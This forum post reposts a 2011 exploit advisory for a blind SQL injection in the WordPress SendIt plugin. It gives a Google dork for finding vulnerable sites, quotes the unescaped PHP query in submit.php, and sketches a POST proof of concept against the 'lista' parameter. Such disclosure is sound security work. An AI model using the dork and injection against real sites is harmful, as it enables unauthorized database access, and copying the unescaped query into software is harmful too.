Jump to content
LLegoLLaS

WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

Recommended Posts

# Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

# Google Dork: inurl:"wp-content/plugins/sendit/submit.php"

# Date: 2011-08-25

# Author: evilsocket ( evilsocket [at] gmail [dot] com )

# Software Link: WordPress › Sendit « WordPress Plugins

# Version: 1.5.9 (tested with magic quotes OFF)

---------------

Vulnerable code

---------------

[ submit.php line 27 ]

$user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';");


As you can see, $_POST[lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the
boolean condition checking :


[ submit.php line 29 ]

if($user_count>0) :
$errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
die($errore_presente);

---

PoC

---

POST:


email_add = [email protected]
lista = BLIND SQL INJECTION HERE

TO:


http://www.site.com/wp-content/plugins/sendit/submit.php

sursa

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...